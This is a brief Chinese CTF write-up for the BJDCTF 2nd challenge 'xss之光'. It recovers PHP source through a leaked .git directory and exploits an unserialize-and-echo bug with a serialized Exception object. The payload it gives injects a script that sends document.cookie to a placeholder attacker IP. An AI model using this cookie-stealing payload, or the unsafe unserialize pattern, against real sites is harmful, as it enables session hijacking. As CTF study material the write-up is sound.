[BJDCTF 2nd]xss之光
.git文件泄露
上GitHack获取源码
<?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a);
原生类构造
payload
<?php $a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</script>")); echo urlencode($a); ?>
参考
https://blog.csdn.net/SopRomeo/article/details/105123395
https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html#_label2
